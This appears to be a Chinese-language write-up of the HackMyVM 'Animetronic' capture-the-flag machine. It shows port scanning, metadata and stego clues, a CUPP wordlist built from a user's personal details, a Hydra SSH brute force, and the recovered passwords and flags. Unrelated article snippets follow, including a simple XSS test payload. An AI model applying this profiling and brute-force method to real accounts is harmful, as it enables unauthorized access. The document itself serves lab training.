HackMyVM-Animetronic

news2024/12/24 3:51:32


目录

信息收集

arp

nmap

nikto

whatweb

WEB

web信息收集

feroxbuster

steghide

exiftool

hydra

ssh连接

提权

系统信息收集

socat提权


信息收集

arp
┌──(root㉿0x00)-[~/HackMyVM]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:9d:6d:7b, IPv4: 192.168.9.183
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.9.189   08:00:27:43:25:2f       PCS Systemtechnik GmbH

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.004 seconds (127.74 hosts/sec). 7 responded

nmap
端口信息收集

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -p- 192.168.9.189 --min-rate 10000                          
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-07 16:29 CST
Nmap scan report for 192.168.9.189
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:43:25:2F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.48 seconds

版本服务信息收集

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -sC -sV -O -p 22,80 192.168.9.189 --min-rate 10000         
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-07 16:30 CST
Nmap scan report for 192.168.9.189
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_  256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Animetronic
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:43:25:2F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds


nikto
┌──(root㉿0x00)-[~/HackMyVM]
└─# nikto -h http://192.168.9.189                          
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.189
+ Target Hostname:    192.168.9.189
+ Target Port:        80
+ Start Time:         2024-05-07 16:37:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 950, size: 60b24a4fb461c, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ 8103 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-05-07 16:37:28 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


whatweb
┌──(root㉿0x00)-[~/HackMyVM]
└─# whatweb -v http://192.168.9.189   
WhatWeb report for http://192.168.9.189
Status    : 200 OK
Title     : Animetronic
IP        : 192.168.9.189
Country   : RESERVED, ZZ

Summary   : Apache[2.4.52], Bootstrap, HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery, Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.52 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.52 (Ubuntu) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 07 May 2024 08:37:32 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Mon, 27 Nov 2023 16:17:54 GMT
        ETag: "950-60b24a4fb461c-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 1073
        Connection: close
        Content-Type: text/html


WEB

web信息收集

译:

很抱歉,这项服务现在不起作用,因为我们的主工厂发生了一场神秘的火灾。


译:

欢迎来到Animetronic

你需要忠诚的朋友吗?,你睡觉有问题吗?,你需要关心你的人吗?。所以你在合适的地方,我们公司为你提供机器人,他们的名字叫Animetronic。
它可以帮助你在日常生活中,从烹饪早餐到准备卧室。


注意信息收集:

用户名:Animetronic

当我们点击 Get Animetronic  这个按钮时候就出现发生火灾的提示!!
就算我们不点击,但是每次刷新网站都会触发这个事件!

那么目录扫描就成了一个问题!我们使用feroxbuster扫描器!


feroxbuster


一张图片,我们下载到本地分析!

steghide
┌──(root㉿0x00)-[~/HackMyVM]
└─# steghide info  new_employees.jpg
"new_employees.jpg":
  format: jpeg
  capacity: 9.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!

需要密码!!!

exiftool
┌──(root㉿0x00)-[~/HackMyVM]
└─# exiftool new_employees.jpg                                          
ExifTool Version Number         : 12.65
File Name                       : new_employees.jpg
Directory                       : .
File Size                       : 160 kB
File Modification Date/Time     : 2023:11:28 01:11:43+08:00
File Access Date/Time           : 2024:05:07 16:50:50+08:00
File Inode Change Date/Time     : 2024:05:07 16:50:38+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width                     : 703
Image Height                    : 1136
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 703x1136
Megapixels                      : 0.799

┌──(root㉿0x00)-[~/HackMyVM]
└─# echo "ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=" | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן


啥玩意??看着好像被倒过来了?

先反转再逆序即可得到文本!

message_for_michaeן


我尝试了作为密码去提取文件,但是错了,这个应该不是密码!


我尝试作为目录去访问,但是还是不行!
无论是在主站,还是在http://192.168.9.189/staffpages目录下,都不行!

我把 message_for_michaeן 改成了 message_for_michae1访问也不行!改成message_for_michaei访问也不行,改成 message_for_michael访问终于可以了!

译:

嗨,迈克尔
很抱歉我们之间发送信息的方式很复杂。
这是因为我指派了一个强大的黑客来尝试破解
我们的服务器。
顺便说一句,试着更改密码,因为这很容易
发现,因为这是您个人信息的混合
包含在此文件中
personal_info.txt

译:

姓名:迈克尔
年龄:27岁
出生日期:1996年10月19日
儿童人数:3名“ Ahmed-Yasser-Adam ”
爱好:游泳


得到用户信息:

Michael
Ahmed
Yasser
Adam

我们尝试爆破ssh密码!

hydra
在此之前,我们需要一个社工字典进行爆破!

┌──(root㉿0x00)-[~/tools/Information-Gathering_tools/CUPP/cupp]
└─# python3 cupp.py -i         
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Michael
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 19101996                 


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: Ahmed
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: 
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 3984 words.
> Hyperspeed Print? (Y/n) : n
[+] Now load your pistolero with michael.txt and shoot! Good luck!
                                                                                                                                                                                                                                            
┌──(root㉿0x00)-[~/tools/Information-Gathering_tools/CUPP/cupp]
└─# ls
CHANGELOG.md  LICENSE  README.md  cupp-example.gif  cupp-master.zip  cupp.cfg  cupp.py  michael.txt  test_cupp.py

把生成的字典作为密码字典跑hydra!
┌──(root㉿0x00)-[~/HackMyVM]
└─# hydra -l michael -P pass ssh://192.168.9.189                                  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-07 19:55:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.189:22/
[22][ssh] host: 192.168.9.189   login: michael   password: leahcim1996
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-07 19:55:11

michael:leahcim1996


ssh连接
┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh michael@192.168.9.189    
The authenticity of host '192.168.9.189 (192.168.9.189)' can't be established.
ED25519 key fingerprint is SHA256:6amN4h/EjKiHufTd7GABl99uFy+fsL6YXJJRDyzxjGE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.189' (ED25519) to the list of known hosts.
michael@192.168.9.189's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Nov 27 21:01:13 2023 from 10.0.2.6
michael@animetronic:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael)
michael@animetronic:~$ 


提权

系统信息收集
michael@animetronic:~$ cat /etc/passwd | grep "home" | grep -v nologin
henry:x:1000:1000:Hanry:/home/henry:/bin/bash
michael:x:1001:1001::/home/michael:/usr/bin/bash

michael@animetronic:/home/henry$ ls
Note.txt  user.txt
michael@animetronic:/home/henry$ cat user.txt 
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ 

michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file named

aGVucnlwYXNzd29yZC50eHQK

┌──(root㉿0x00)-[~/HackMyVM]
└─# echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d                            
henrypassword.txt

我们需要找到此用户的密码!

密码为:IHateWilliam


socat提权

cat /root/root.txt
153a1b940365f46ebed28d74f142530f280a2c0a

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1660902.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

jenkins部署想定报错

报错: 解决办法: 登录被编译的设备,清楚旧代码,在重新执行

burp靶场xss漏洞(初级篇)

靶场地址 http://portswigger.net/web-security/all-labs#cross-site-scripting 第一关&#xff1a;反射型 1.发现搜索框直接注入payload <script>alert(111)</script> ​ 2.出现弹窗即说明攻击成功 ​ 第二关&#xff1a;存储型 1.需要在评论里插入payload …

object

object.clone() 在 Java 中&#xff0c;Object.clone() 方法执行的是浅拷贝&#xff08;shallow copy&#xff09;&#xff0c;而不是深拷贝&#xff08;deep copy&#xff09;。 浅拷贝&#xff08;Shallow Copy&#xff09;&#xff1a; 浅拷贝是指在拷贝对象时&#xff0…

Al Agent:开启智能化未来的关键角色,让机器更智能的为我们服务

文章目录 &#x1f680;Al Agent是什么&#x1f4d5;Al Agent的工作原理与技术&#x1f4aa;Al Agent应用领域&#x1f680;智能家居应用&#x1f308;医疗健康领域⭐金融服务行业&#x1f302;交通运输管理&#x1f3ac;教育培训应用 &#x1f512;Al Agent优势与挑战✊Al Age…

中国地形可调节高度-UE5-UE4

2000坐标系&#xff0c;可进行高度调整。 支持版本4.21-5.4版本 下载位置&#xff1a;https://mbd.pub/o/bread/ZpWZm5Zs

初探 JUC 并发编程:读写锁 ReentrantReadWriteLock 原理(8000 字源码详解)

本文中会涉及到一些前面 ReentrantLock 中学到的内容&#xff0c;先去阅读一下我关于独占锁 ReentrantLock 的源码解析阅读起来会更加清晰。 初探 JUC 并发编程&#xff1a;独占锁 ReentrantLock 底层源码解析 6.4&#xff09;读写锁 ReentrantReadWriteLock 原理 前面提到的 R…

LeetCode 209 长度最小的子数组(滑动窗口and暴力)

、 法一&#xff1a;滑动窗口 //使用滑动窗口来解决问题 //滑动窗口的核心点有&#xff1a; /*1.窗口内是什么&#xff1f;2.如何移动窗口的起始位置&#xff1f;3.如何移动窗口的结束位置&#xff1f;4.两个指针&#xff0c;怎么判断哪个指针是终止指针&#xff0c;哪个指针…

【核武器】2024 年美国核武器-20240507

2024年5月7日,《原子科学家公报》发布了最新版的2024美国核武器手册 Hans M. Kristensen, Matt Korda, Eliana Johns, and Mackenzie Knight, United States nuclear weapons, 2024, Bulletin of the Atomic Scientists, 80:3, 182-208, DOI: https://doi.org/10.1080/00963…

【JavaScript】内置对象 - 数组对象 ① ( 数组简介 | 数组创建 | 数组类型检测 )

文章目录 一、数组对象1、数组简介2、数组创建3、数组检测 - Array.isArray() 方法4、数组检测 - instanceof 运算符 Array 数组对象参考文档 : https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Array 一、数组对象 1、数组简介 在 JavaScr…

嫁接打印的技术要点

所谓嫁接打印&#xff0c;是一种增减材混合制造的方式。它将已成形的模具零件当作基座&#xff0c;在此基础上“生长”出打印的零件。其中基座通常采用传统加工方式制造&#xff0c;而打印部分则使用专用的金属粉末&#xff0c;通过 3D 打印技术成型。 嫁接打印之所以备受欢迎&…

PyTorch 图像篇

计算机视觉技术是一门包括计算机科学与工程、神经生理学、物理学、信号处理、认知科学、应用数学与统计等多学科的综合性科学技术&#xff0c; 是人工智能的一个重要分支&#xff0c; 目前在智能安防、自动驾驶汽车、医疗保健、生成制造等领域具有重要的应用价值。 计算机视觉…

Spring AOP(3)

目录 Spring AOP原理 代理模式 代理模式中的主要角色 静态代理 动态代理 总结:面试题 什么是AOP? Spring AOP实现的方式有哪些? Spring AOP实现原理 Spring使用的是哪种代理方式? JDK和CGLIB动态代理的区别? Spring AOP原理 代理模式 代理模式, 也叫委托模式. …

网络安全之交换基础

交换属于二层技术。路由器&#xff08;router&#xff09;是三层设备&#xff0c;可以基于IP地址转发&#xff0c;但需要路由表来记录。 交换机&#xff08;switch&#xff09;是二层设备&#xff0c;网桥&#xff08;switch&#xff09;也是二层设备&#xff0c;这两个都是基…

论文解读--------FedMut: Generalized Federated Learning via Stochastic Mutation

动机 Many previous works observed that the well-generalized solutions are located in flat areas rather than sharp areas of the loss landscapes. 通常&#xff0c;由于每个本地模型的任务是相同的&#xff0c;因此每个客户端的损失情况仍然相似。直观上&#xff0c;…

【qt】联合容器和集合容器

联合容器和集合容器 一.QMap1.应用场景2.添加数据3.删除数据4.修改数据5.查找数据6.数据个数7.是否包含8.返回所有的键名 二.QHash1.应用场景&#xff1a; 三.QMultiMap四.QMultiHash五.QSet1.应用场景2.交集3.并集4.差集 总结&#xff1a; 一.QMap 1.应用场景 QMap的底层实现…

【NPM】Nginx Proxy Manager 一键申请 SSL 证书,自动续期,解决阿里云SSL免费证书每3个月失效问题

文章目录 1、NPM 简介2、实战Step 1&#xff1a;环境搭建 也可以看作者安装笔记 Step 2&#xff1a;创建容器 2.1 在系统任意位置创建一个文件夹&#xff0c;此文档以~/nginx-proxy-manager为例。2.2 创建docker-compose.yaml2.3 启动NPM服务 Step 3&#xff1a;配置反向代理3…

Java入门基础学习笔记10——变量

变量的学习路径&#xff1a; 认识变量->为什么要用变量&#xff1f;->变量有啥特点&#xff1f;->变量有啥应用场景&#xff1f; 什么是变量&#xff1f; 变量是用来记住程序要处理的数据的。 变量的定义格式&#xff1a; 数据类型 变量名称 数据&#xff1b; 数…

JavaScript使用 BigInt

在 JavaScript 中&#xff0c;最大的安全整数是 2 的 53 次方减 1&#xff0c;即 Number.MAX_SAFE_INTEGER&#xff0c;其值为 9007199254740991。这是因为 JavaScript 中使用双精度浮点数表示数字&#xff0c;双精度浮点数的符号位占 1 位&#xff0c;指数位占 11 位&#xff…

NB-IoT电表抄表是什么?

1.技术性简述 NB-IoT是一种低功耗广域网络技术性&#xff0c;尤其适用于规模性联接、深层覆盖和低数据传输速率的使用场景&#xff0c;如远程控制电表抄表。相较于传统有线应无线通讯方法&#xff0c;NB-IoT具有更好的穿透性和更广的覆盖面积&#xff0c;即便在地下室或边远地…

纯 CSS 实现标签自动显示超出数量

现代 CSS 强大的令人难以置信。 这次我们来用 CSS 实现这样一个功能&#xff1a;有多个宽度不同的标签水平排列&#xff0c;当外层宽度不足时&#xff0c;会提示超出的数量&#xff0c;演示效果如下 如果让我用 JavaScript来实现估计都有点折腾&#xff0c;毕竟宽度都是动态的…